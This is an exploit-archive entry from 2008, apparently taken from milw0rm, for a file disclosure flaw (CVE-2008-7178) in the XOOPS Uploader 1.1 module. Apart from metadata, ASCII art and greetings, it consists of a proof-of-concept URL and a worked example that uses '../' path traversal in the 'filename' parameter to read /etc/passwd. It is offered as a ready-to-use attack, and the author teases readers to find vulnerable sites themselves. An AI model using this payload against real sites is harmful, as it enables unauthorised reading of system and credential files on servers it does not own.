XOOPS Module Uploader 1.1 - 'Filename' File Disclosure



EKU-ID: 13687 CVE: OSVDB-57810;CVE-2008-7178 OSVDB-ID:
Author: MEEKAAH Published: 2008-06-08 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


                                        MMM                                 MMM
                                        MMM                                 MMM
MMMMMMMMMMMMM    MMMMMMMMM  MMMMMMMMMM  MMMMMMMMM    MMMMMMMMM   MMMMMMMMM  MMMMMMMMM
MM   MMM   MMM   MM         MMM         MMM    MMM  MMM    MMM  MMM    MMM  MMM    MMM
MM   MMM   MMM   MMMMMMM    MMMMMMMM    MMM    MMM  MMM    MMM  MMM    MMM  MMM    MMM
MM   MMM   MMM   MMMMMMM    MMMMMMMM    MMM MMMMM   MMMMMMMMMM  MMMMMMMMMM  MMM    MMM
MM   MMM   MMM   MM         MMM         MMM  MMMN   MMM    MMM  MMM    MMM  MMM    MMM
MM   MMM   MMM   MMMMMMMMM  MMMMMMMMMM  MMM   NMM   MMM    MMM  MMM    MMM  MMM    MMM


[*] Vulnerable : XOOPS Module Uploader 1.1 - Local File Inclusion
                 Module url : http://www.xoops.org/modules/repository/singlefile.php?cid=28&lid=1243

[*] Author     :  MEEKAAH

[*] Dork       :  Find it yourself ;)

[*] POC        :  http://localhost/modules/uploader/index.php?action=downloadfile&filename=[LFI]

[*] Example    :  http://localhost/modules/uploader/index.php?action=downloadfile&filename=../../../../../../../../../../../../../../../../etc/passwd

-----------------------------------------------------------------------------------------------------------

[*] Greetings  :  Alex, Adeel, CeBbZ, Cubacola, Noel ...

# milw0rm.com [2008-06-08]